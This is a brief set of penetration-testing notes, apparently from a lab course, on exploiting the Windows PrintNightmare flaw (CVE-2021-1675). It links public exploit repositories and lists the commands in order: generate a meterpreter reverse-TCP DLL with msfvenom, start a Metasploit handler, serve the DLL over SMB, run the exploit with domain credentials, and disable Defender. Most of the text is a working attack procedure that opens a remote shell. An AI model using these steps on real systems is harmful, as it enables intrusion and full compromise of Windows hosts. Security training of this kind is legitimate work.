print nightmare (2021)

print nightmare (CVE-2021-1675)

tooling

• https://github.com/cube0x0/CVE-2021-1675
• https://github.com/calebstewart/CVE-2021-1675

how to test for

• rpcdump.py
• add smbserver locally
• create malicious dll
  • msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=5555 -f dll > shell.dll
• msfconsole
  • use multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set LPORT 5555
  • set LHOST
  • run
• smbserver.py share pwd -smb2-support
• ./CVE-2021-1675 marvel.local/fcastle:[email protected] ‘\\share\shell.dll’
• again need to turn off defender